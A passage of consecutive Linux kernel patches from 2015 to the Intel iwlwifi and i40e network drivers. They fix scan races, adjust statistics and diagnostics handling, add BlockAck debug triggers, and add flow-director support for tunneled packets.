iwl_mvm *mvm, mvm->scan_uid_status[uid] = 0; - if (!sched) { - ieee80211_scan_completed(mvm->hw, - notif->status == - IWL_SCAN_OFFLOAD_ABORTED); - iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } else if (iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_SCHED) < 0) { - ieee80211_sched_scan_stopped(mvm->hw); - } else { - IWL_DEBUG_SCAN(mvm, "Another sched scan is running\n"); - } - return 0; } @@ -1430,7 +1428,7 @@ static int iwl_mvm_umac_scan_abort(struct iwl_mvm *mvm, int type) ret = iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); if (!ret) - mvm->scan_uid_status[uid] = 0; + mvm->scan_uid_status[uid] = type << IWL_MVM_SCAN_STOPPING_SHIFT; return ret; } From 262888fcc70d42343dfb137a021d45be05183da6 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 17:21:09 +0300 Subject: [PATCH 393/872] iwlwifi: mvm: treat scan races also on UMAC scans For UMAC, we were not treating a race condition that happens in the scan flows, because it was not using the same state flags. Now that UMAC and LMAC scans use the same state flags, we can also handle the race conditions for UMAC. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index d3af88bcff80..cea2366fc72e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -2413,11 +2413,7 @@ static void iwl_mvm_mac_cancel_hw_scan(struct ieee80211_hw *hw, * cancel scan scan before ieee80211_scan_work() could run. * To handle that, simply return if the scan is not running. */ - /* FIXME: for now, we ignore this race for UMAC scans, since - * they don't set the scan_status. - */ - if ((mvm->scan_status & IWL_MVM_SCAN_REGULAR) || - (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) + if (mvm->scan_status & IWL_MVM_SCAN_REGULAR) iwl_mvm_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); mutex_unlock(&mvm->mutex); @@ -2767,11 +2763,7 @@ static int iwl_mvm_mac_sched_scan_stop(struct ieee80211_hw *hw, * could run. To handle this, simply return if the scan is * not running. */ - /* FIXME: for now, we ignore this race for UMAC scans, since - * they don't set the scan_status. - */ - if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED) && - !(mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { + if (!(mvm->scan_status & IWL_MVM_SCAN_SCHED)) { mutex_unlock(&mvm->mutex); return 0; } From e120814d74bc805769d18ed7177f43a17a88fd40 Mon Sep 17 00:00:00 2001 From: Neerav Parikh Date: Thu, 16 Apr 2015 20:05:58 -0400 Subject: [PATCH 394/872] i40e: Collect PFC XOFF RX stats even in single TC case When PFC is enabled for any UP in single TC configuration the driver didn't collect the PFC XOFF RX stats. Though a single TC with PFC enabled is not a common scenario do not prevent the driver from collecting stats if firmware indicates that PFC is enabled. Change-ID: Ie20bd58b07608b528f3c6d95894c9ae56b00077a Signed-off-by: Neerav Parikh Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_main.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c index a54c14491e3b..f1a8c4c1e389 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_main.c +++ b/drivers/net/ethernet/intel/i40e/i40e_main.c @@ -772,9 +772,8 @@ static void i40e_update_prio_xoff_rx(struct i40e_pf *pf) dcb_cfg = &hw->local_dcbx_config; - /* See if DCB enabled with PFC TC */ - if (!(pf->flags & I40E_FLAG_DCB_ENABLED) || - !(dcb_cfg->pfc.pfcenable)) { + /* Collect Link XOFF stats when PFC is disabled */ + if (!dcb_cfg->pfc.pfcenable) { i40e_update_link_xoff_rx(pf); return; } From e17bc411aea8fbebc51857037f104ab09f765120 Mon Sep 17 00:00:00 2001 From: Greg Rose Date: Thu, 16 Apr 2015 20:05:59 -0400 Subject: [PATCH 395/872] i40e: Disable offline diagnostics if VFs are enabled Require the user to disable virtual functions before running the device offline diagnostics. The offline diagnostics are intended to ensure basic operation of the device - it is beyond the scope of the diagnostic test to handle the additional complexity of bringing all the virtual functions offline and then back online for each test run. Change-ID: Ic0b854851a09fc85df0c9e82c220e45885457c30 Signed-off-by: Greg Rose Tested-by: Jim Young Signed-off-by: Jeff Kirsher --- .../net/ethernet/intel/i40e/i40e_ethtool.c | 27 +++++++++++++++++++ .../ethernet/intel/i40e/i40e_virtchnl_pf.c | 7 +++++ 2 files changed, 34 insertions(+) diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c index 4cbaaeb902c4..e77b6bddd90e 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c +++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c @@ -1548,6 +1548,17 @@ static int i40e_loopback_test(struct net_device *netdev, u64 *data) return *data; } +static inline bool i40e_active_vfs(struct i40e_pf *pf) +{ + struct i40e_vf *vfs = pf->vf; + int i; + + for (i = 0; i < pf->num_alloc_vfs; i++) + if (vfs[i].vf_states & I40E_VF_STAT_ACTIVE) + return true; + return false; +} + static void i40e_diag_test(struct net_device *netdev, struct ethtool_test *eth_test, u64 *data) { @@ -1560,6 +1571,20 @@ static void i40e_diag_test(struct net_device *netdev, netif_info(pf, drv, netdev, "offline testing starting\n"); set_bit(__I40E_TESTING, &pf->state); + + if (i40e_active_vfs(pf)) { + dev_warn(&pf->pdev->dev, + "Please take active VFS offline and restart the adapter before running NIC diagnostics\n"); + data[I40E_ETH_TEST_REG] = 1; + data[I40E_ETH_TEST_EEPROM] = 1; + data[I40E_ETH_TEST_INTR] = 1; + data[I40E_ETH_TEST_LOOPBACK] = 1; + data[I40E_ETH_TEST_LINK] = 1; + eth_test->flags |= ETH_TEST_FL_FAILED; + clear_bit(__I40E_TESTING, &pf->state); + goto skip_ol_tests; + } + /* If the device is online then take it offline */ if (if_running) /* indicate we're in test mode */ @@ -1605,6 +1630,8 @@ static void i40e_diag_test(struct net_device *netdev, data[I40E_ETH_TEST_LOOPBACK] = 0; } +skip_ol_tests: + netif_info(pf, drv, netdev, "testing finished\n"); } diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c index 78d1c4ff565e..4653b6e653c9 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c +++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c @@ -980,6 +980,13 @@ static int i40e_pci_sriov_enable(struct pci_dev *pdev, int num_vfs) int pre_existing_vfs = pci_num_vf(pdev); int err = 0; + if (pf->state & __I40E_TESTING) { + dev_warn(&pdev->dev, + "Cannot enable SR-IOV virtual functions while the device is undergoing diagnostic testing\n"); + err = -EPERM; + goto err_out; + } + dev_info(&pdev->dev, "Allocating %d VFs.\n", num_vfs); if (pre_existing_vfs && pre_existing_vfs != num_vfs) i40e_free_vfs(pf); From 4203263d8302be20c5fa8a2ceb1ca3527808ad4e Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Wed, 15 Apr 2015 12:43:46 +0300 Subject: [PATCH 396/872] iwlwifi: mvm: implement the BlockAck related debug triggers BlockAck sessions can have events that are interesting to debug. When we send or receive a BAR, it is may indicate that something bad is happening. Even more so when mac80211 tells us that a frame timed out in the reodering buffer. Add a few triggers for BlockAck session debugging. Allow per-TID debugging. Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-drv.c | 6 +- .../net/wireless/iwlwifi/iwl-fw-error-dump.h | 6 +- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 27 ++++ drivers/net/wireless/iwlwifi/mvm/mac80211.c | 140 +++++++++++++++++- drivers/net/wireless/iwlwifi/mvm/tx.c | 31 +++- 5 files changed, 200 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-drv.c b/drivers/net/wireless/iwlwifi/iwl-drv.c index 7267152e7dc7..12566c8cb275 100644 --- a/drivers/net/wireless/iwlwifi/iwl-drv.c +++ b/drivers/net/wireless/iwlwifi/iwl-drv.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2007 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -1239,6 +1239,8 @@ static void iwl_req_fw_callback(const struct firmware *ucode_raw, void *context) sizeof(struct iwl_fw_dbg_trigger_txq_timer); trigger_tlv_sz[FW_DBG_TRIGGER_TIME_EVENT] = sizeof(struct iwl_fw_dbg_trigger_time_event); + trigger_tlv_sz[FW_DBG_TRIGGER_BA] = + sizeof(struct iwl_fw_dbg_trigger_ba); for (i = 0; i < ARRAY_SIZE(drv->fw.dbg_trigger_tlv); i++) { if (pieces->dbg_trigger_tlv[i]) { diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h b/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h index 251bf8dc4a12..e57dbd0ef2e1 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-error-dump.h @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -254,6 +254,7 @@ iwl_fw_error_next_data(struct iwl_fw_error_dump_data *data) * detection. * @FW_DBG_TRIGGER_TIME_EVENT: trigger log collection upon time events related * events. + * @FW_DBG_TRIGGER_BA: trigger log collection upon BlockAck related events. */ enum iwl_fw_dbg_trigger { FW_DBG_TRIGGER_INVALID = 0, @@ -267,6 +268,7 @@ enum iwl_fw_dbg_trigger { FW_DBG_TRIGGER_RSSI, FW_DBG_TRIGGER_TXQ_TIMERS, FW_DBG_TRIGGER_TIME_EVENT, + FW_DBG_TRIGGER_BA, /* must be last */ FW_DBG_TRIGGER_MAX, diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index 839b2c4a1ad8..a8d0b6423f7c 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -663,6 +663,33 @@ struct iwl_fw_dbg_trigger_time_event { } __packed time_events[16]; } __packed; +/** + * struct iwl_fw_dbg_trigger_ba - configures BlockAck related trigger + * rx_ba_start: tid bitmap to configure on what tid the trigger should occur + * when an Rx BlockAck session is started. + * rx_ba_stop: tid bitmap to configure on what tid the trigger should occur + * when an Rx BlockAck session is stopped. + * tx_ba_start: tid bitmap to configure on what tid the trigger should occur + * when a Tx BlockAck session is started. + * tx_ba_stop: tid bitmap to configure on what tid the trigger should occur + * when a Tx BlockAck session is stopped. + * rx_bar: tid bitmap to configure on what tid the trigger should occur + * when a BAR is received (for a Tx BlockAck session). + * tx_bar: tid bitmap to configure on what tid the trigger should occur + * when a BAR is send (for an Rx BlocAck session). + * frame_timeout: tid bitmap to configure on what tid the trigger should occur + * when a frame times out in the reodering buffer. + */ +struct iwl_fw_dbg_trigger_ba { + __le16 rx_ba_start; + __le16 rx_ba_stop; + __le16 tx_ba_start; + __le16 tx_ba_stop; + __le16 rx_bar; + __le16 tx_bar; + __le16 frame_timeout; +} __packed; + /** * struct iwl_fw_dbg_conf_tlv - a TLV that describes a debug configuration. * @id: conf id diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index cea2366fc72e..71b66cb6ff12 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -737,6 +737,60 @@ static inline bool iwl_enable_tx_ampdu(const struct iwl_cfg *cfg) return true; } +#define CHECK_BA_TRIGGER(_mvm, _trig, _tid_bm, _tid, _fmt...) \ + do { \ + if (!(le16_to_cpu(_tid_bm) & BIT(_tid))) \ + break; \ + iwl_mvm_fw_dbg_collect_trig(_mvm, _trig, _fmt); \ + } while (0) + +static void +iwl_mvm_ampdu_check_trigger(struct iwl_mvm *mvm, struct ieee80211_vif *vif, + struct ieee80211_sta *sta, u16 tid, u16 rx_ba_ssn, + enum ieee80211_ampdu_mlme_action action) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + + if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) + return; + + switch (action) { + case IEEE80211_AMPDU_TX_OPERATIONAL: { + struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta); + struct iwl_mvm_tid_data *tid_data = &mvmsta->tid_data[tid]; + + CHECK_BA_TRIGGER(mvm, trig, ba_trig->tx_ba_start, tid, + "TX AGG START: MAC %pM tid %d ssn %d\n", + sta->addr, tid, tid_data->ssn); + break; + } + case IEEE80211_AMPDU_TX_STOP_CONT: + CHECK_BA_TRIGGER(mvm, trig, ba_trig->tx_ba_stop, tid, + "TX AGG STOP: MAC %pM tid %d\n", + sta->addr, tid); + break; + case IEEE80211_AMPDU_RX_START: + CHECK_BA_TRIGGER(mvm, trig, ba_trig->rx_ba_start, tid, + "RX AGG START: MAC %pM tid %d ssn %d\n", + sta->addr, tid, rx_ba_ssn); + break; + case IEEE80211_AMPDU_RX_STOP: + CHECK_BA_TRIGGER(mvm, trig, ba_trig->rx_ba_stop, tid, + "RX AGG STOP: MAC %pM tid %d\n", + sta->addr, tid); + break; + default: + break; + } +} + static int iwl_mvm_mac_ampdu_action(struct ieee80211_hw *hw, struct ieee80211_vif *vif, enum ieee80211_ampdu_mlme_action action, @@ -813,6 +867,16 @@ static int iwl_mvm_mac_ampdu_action(struct ieee80211_hw *hw, ret = -EINVAL; break; } + + if (!ret) { + u16 rx_ba_ssn = 0; + + if (action == IEEE80211_AMPDU_RX_START) + rx_ba_ssn = *ssn; + + iwl_mvm_ampdu_check_trigger(mvm, vif, sta, tid, + rx_ba_ssn, action); + } mutex_unlock(&mvm->mutex); /* @@ -3904,9 +3968,9 @@ static void iwl_mvm_mac_sta_statistics(struct ieee80211_hw *hw, mutex_unlock(&mvm->mutex); } -static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, - struct ieee80211_vif *vif, - const struct ieee80211_event *event) +static void iwl_mvm_event_mlme_callback(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) { #define CHECK_MLME_TRIGGER(_mvm, _trig, _buf, _cnt, _fmt...) \ do { \ @@ -3915,7 +3979,6 @@ static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, iwl_mvm_fw_dbg_collect_trig(_mvm, _trig, _fmt);\ } while (0) - struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw); struct iwl_fw_dbg_trigger_tlv *trig; struct iwl_fw_dbg_trigger_mlme *trig_mlme; @@ -3959,6 +4022,75 @@ static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, #undef CHECK_MLME_TRIGGER } +static void iwl_mvm_event_bar_rx_callback(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) + return; + + if (!(le16_to_cpu(ba_trig->rx_bar) & BIT(event->u.ba.tid))) + return; + + iwl_mvm_fw_dbg_collect_trig(mvm, trig, + "BAR received from %pM, tid %d, ssn %d", + event->u.ba.sta->addr, event->u.ba.tid, + event->u.ba.ssn); +} + +static void +iwl_mvm_event_frame_timeout_callback(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + if (!iwl_fw_dbg_trigger_check_stop(mvm, vif, trig)) + return; + + if (!(le16_to_cpu(ba_trig->frame_timeout) & BIT(event->u.ba.tid))) + return; + + iwl_mvm_fw_dbg_collect_trig(mvm, trig, + "Frame from %pM timed out, tid %d", + event->u.ba.sta->addr, event->u.ba.tid); +} + +static void iwl_mvm_mac_event_callback(struct ieee80211_hw *hw, + struct ieee80211_vif *vif, + const struct ieee80211_event *event) +{ + struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw); + + switch (event->type) { + case MLME_EVENT: + iwl_mvm_event_mlme_callback(mvm, vif, event); + break; + case BAR_RX_EVENT: + iwl_mvm_event_bar_rx_callback(mvm, vif, event); + break; + case BA_FRAME_TIMEOUT: + iwl_mvm_event_frame_timeout_callback(mvm, vif, event); + break; + default: + break; + } +} + const struct ieee80211_ops iwl_mvm_hw_ops = { .tx = iwl_mvm_mac_tx, .ampdu_action = iwl_mvm_mac_ampdu_action, diff --git a/drivers/net/wireless/iwlwifi/mvm/tx.c b/drivers/net/wireless/iwlwifi/mvm/tx.c index ef32e177f662..57e0cbb35f37 100644 --- a/drivers/net/wireless/iwlwifi/mvm/tx.c +++ b/drivers/net/wireless/iwlwifi/mvm/tx.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -70,6 +70,30 @@ #include "mvm.h" #include "sta.h" +static void +iwl_mvm_bar_check_trigger(struct iwl_mvm *mvm, const u8 *addr, + u16 tid, u16 ssn) +{ + struct iwl_fw_dbg_trigger_tlv *trig; + struct iwl_fw_dbg_trigger_ba *ba_trig; + + if (!iwl_fw_dbg_trigger_enabled(mvm->fw, FW_DBG_TRIGGER_BA)) + return; + + trig = iwl_fw_dbg_get_trigger(mvm->fw, FW_DBG_TRIGGER_BA); + ba_trig = (void *)trig->data; + + if (!iwl_fw_dbg_trigger_check_stop(mvm, NULL, trig)) + return; + + if (!(le16_to_cpu(ba_trig->tx_bar) & BIT(tid))) + return; + + iwl_mvm_fw_dbg_collect_trig(mvm, trig, + "BAR sent to %pM, tid %d, ssn %d", + addr, tid, ssn); +} + /* * Sets most of the Tx cmd's fields */ @@ -101,12 +125,15 @@ void iwl_mvm_set_tx_cmd(struct iwl_mvm *mvm, struct sk_buff *skb, } else if (ieee80211_is_back_req(fc)) { struct ieee80211_bar *bar = (void *)skb->data; u16 control = le16_to_cpu(bar->control); + u16 ssn = le16_to_cpu(bar->start_seq_num); tx_flags |= TX_CMD_FLG_ACK | TX_CMD_FLG_BAR; tx_cmd->tid_tspec = (control & IEEE80211_BAR_CTRL_TID_INFO_MASK) >> IEEE80211_BAR_CTRL_TID_INFO_SHIFT; WARN_ON_ONCE(tx_cmd->tid_tspec >= IWL_MAX_TID_COUNT); + iwl_mvm_bar_check_trigger(mvm, bar->ra, tx_cmd->tid_tspec, + ssn); } else { tx_cmd->tid_tspec = IWL_TID_NON_QOS; if (info->flags & IEEE80211_TX_CTL_ASSIGN_SEQ) From 8b2b9fbf7e4e1b2e866239d46248431f719ba2c1 Mon Sep 17 00:00:00 2001 From: Arik Nemtsov Date: Wed, 4 Mar 2015 13:16:03 +0200 Subject: [PATCH 397/872] iwlwifi: mvm: clean interfaces on drv_stop If a HW recovery was started but not completed since all interfaces went down, make sure to cleanup all interfaces before clearing the HW_RESTART flag. Signed-off-by: Arik Nemtsov Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 71b66cb6ff12..9e517e20a14e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -1489,8 +1489,12 @@ void __iwl_mvm_mac_stop(struct iwl_mvm *mvm) /* * Clear IN_HW_RESTART flag when stopping the hw (as restart_complete() * won't be called in this case). + * But make sure to cleanup interfaces that have gone down before/during + * HW restart was requested. */ - clear_bit(IWL_MVM_STATUS_IN_HW_RESTART, &mvm->status); + if (test_and_clear_bit(IWL_MVM_STATUS_IN_HW_RESTART, &mvm->status)) + ieee80211_iterate_interfaces(mvm->hw, 0, + iwl_mvm_cleanup_iterator, mvm); /* We shouldn't have any UIDs still set. Loop over all the UIDs to * make sure there's nothing left there and warn if any is found. From 89232c3bf78b3799699e48201f60892283564b78 Mon Sep 17 00:00:00 2001 From: Anjali Singhai Jain Date: Thu, 16 Apr 2015 20:06:00 -0400 Subject: [PATCH 398/872] i40e/i40evf: Add ATR support for tunneled TCP/IPv4/IPv6 packets. Without this, RSS would have done inner header load balancing. Now we can get the benefits of ATR for tunneled packets to better align TX and RX queues with the right core/interrupt. Change-ID: I07d0e0a192faf28fdd33b2f04c32b2a82ff97ddd Signed-off-by: Anjali Singhai Jain Signed-off-by: Jesse Brandeburg Signed-off-by: Jeff Kirsher --- drivers/net/ethernet/intel/i40e/i40e_txrx.c | 77 +++++++++++-------- drivers/net/ethernet/intel/i40e/i40e_txrx.h | 1 + drivers/net/ethernet/intel/i40evf/i40e_txrx.c | 34 ++++---- drivers/net/ethernet/intel/i40evf/i40e_txrx.h | 1 + 4 files changed, 62 insertions(+), 51 deletions(-) diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c index 0b4a7be2c7d2..8565495b8680 100644 --- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c +++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c @@ -1923,11 +1923,11 @@ int i40e_napi_poll(struct napi_struct *napi, int budget) * i40e_atr - Add a Flow Director ATR filter * @tx_ring: ring to add programming descriptor to * @skb: send buffer - * @flags: send flags + * @tx_flags: send tx flags * @protocol: wire protocol **/ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, - u32 flags, __be16 protocol) + u32 tx_flags, __be16 protocol) { struct i40e_filter_program_desc *fdir_desc; struct i40e_pf *pf = tx_ring->vsi->back; @@ -1952,25 +1952,38 @@ static void i40e_atr(struct i40e_ring *tx_ring, struct sk_buff *skb, if (!tx_ring->atr_sample_rate) return; - /* snag network header to get L4 type and address */ - hdr.network = skb_network_header(skb); + if (!(tx_flags & (I40E_TX_FLAGS_IPV4 | I40E_TX_FLAGS_IPV6))) + return; - /* Currently only IPv4/IPv6 with TCP is supported */ - if (protocol == htons(ETH_P_IP)) { - if (hdr.ipv4->protocol != IPPROTO_TCP) - return; + if (!(tx_flags & I40E_TX_FLAGS_VXLAN_TUNNEL)) { + /* snag network header to get L4 type and address */ + hdr.network = skb_network_header(skb); - /* access ihl as a u8 to avoid unaligned access on ia64 */ - hlen = (hdr.network[0] & 0x0F) << 2; - } else if (protocol == htons(ETH_P_IPV6)) { - if (hdr.ipv6->nexthdr != IPPROTO_TCP) + /* Currently only IPv4/IPv6 with TCP is supported + * access ihl as u8 to avoid unaligned access on ia64 + */ + if (tx_flags & I40E_TX_FLAGS_IPV4) + hlen = (hdr.network[0] & 0x0F) << 2; + else if (protocol == htons(ETH_P_IPV6)) + hlen = sizeof(struct ipv6hdr); + else return; - - hlen = sizeof(struct ipv6hdr); } else { - return; + hdr.network = skb_inner_network_header(skb); + hlen = skb_inner_network_header_len(skb); } + /* Currently only IPv4/IPv6 with TCP is supported + * Note: tx_flags gets modified to reflect inner protocols in + * tx_enable_csum function if encap is enabled. + */ + if ((tx_flags & I40E_TX_FLAGS_IPV4) && + (hdr.ipv4->protocol != IPPROTO_TCP)) + return; + else if ((tx_flags & I40E_TX_FLAGS_IPV6) && + (hdr.ipv6->nexthdr != IPPROTO_TCP)) + return; + th = (struct tcphdr *)(hdr.network + hlen); /* Due to lack of space, no more new filters can be programmed */ @@ -2117,16 +2130,14 @@ static int i40e_tx_prepare_vlan_flags(struct sk_buff *skb, * i40e_tso - set up the tso context descriptor * @tx_ring: ptr to the ring to send * @skb: ptr to the skb we're sending - * @tx_flags: the collected send information - * @protocol: the send protocol * @hdr_len: ptr to the size of the packet header * @cd_tunneling: ptr to context descriptor bits * * Returns 0 if no TSO can happen, 1 if tso is going, or error **/ static int i40e_tso(struct i40e_ring *tx_ring, struct sk_buff *skb, - u32 tx_flags, __be16 protocol, u8 *hdr_len, - u64 *cd_type_cmd_tso_mss, u32 *cd_tunneling) + u8 *hdr_len, u64 *cd_type_cmd_tso_mss, + u32 *cd_tunneling) { u32 cd_cmd, cd_tso_len, cd_mss; struct ipv6hdr *ipv6h; @@ -2218,12 +2229,12 @@ static int i40e_tsyn(struct i40e_ring *tx_ring, struct sk_buff *skb, /** * i40e_tx_enable_csum - Enable Tx checksum offloads * @skb: send buffer - * @tx_flags: Tx flags currently set + * @tx_flags: pointer to Tx flags currently set * @td_cmd: Tx descriptor command bits to set * @td_offset: Tx descriptor header offsets to set * @cd_tunneling: ptr to context desc bits **/ -static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, +static void i40e_tx_enable_csum(struct sk_buff *skb, u32 *tx_flags, u32 *td_cmd, u32 *td_offset, struct i40e_ring *tx_ring, u32 *cd_tunneling) @@ -2239,6 +2250,7 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, switch (ip_hdr(skb)->protocol) { case IPPROTO_UDP: l4_tunnel = I40E_TXD_CTX_UDP_TUNNELING; + *tx_flags |= I40E_TX_FLAGS_VXLAN_TUNNEL; break; default: return; @@ -2248,18 +2260,17 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, this_ipv6_hdr = inner_ipv6_hdr(skb); this_tcp_hdrlen = inner_tcp_hdrlen(skb); - if (tx_flags & I40E_TX_FLAGS_IPV4) { - - if (tx_flags & I40E_TX_FLAGS_TSO) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_TSO) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4; ip_hdr(skb)->check = 0; } else { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV4_NO_CSUM; } - } else if (tx_flags & I40E_TX_FLAGS_IPV6) { + } else if (*tx_flags & I40E_TX_FLAGS_IPV6) { *cd_tunneling |= I40E_TX_CTX_EXT_IP_IPV6; - if (tx_flags & I40E_TX_FLAGS_TSO) + if (*tx_flags & I40E_TX_FLAGS_TSO) ip_hdr(skb)->check = 0; } @@ -2271,8 +2282,8 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, skb_transport_offset(skb)) >> 1) << I40E_TXD_CTX_QW0_NATLEN_SHIFT; if (this_ip_hdr->version == 6) { - tx_flags &= ~I40E_TX_FLAGS_IPV4; - tx_flags |= I40E_TX_FLAGS_IPV6; + *tx_flags &= ~I40E_TX_FLAGS_IPV4; + *tx_flags |= I40E_TX_FLAGS_IPV6; } } else { network_hdr_len = skb_network_header_len(skb); @@ -2282,12 +2293,12 @@ static void i40e_tx_enable_csum(struct sk_buff *skb, u32 tx_flags, } /* Enable IP checksum offloads */ - if (tx_flags & I40E_TX_FLAGS_IPV4) { + if (*tx_flags & I40E_TX_FLAGS_IPV4) { 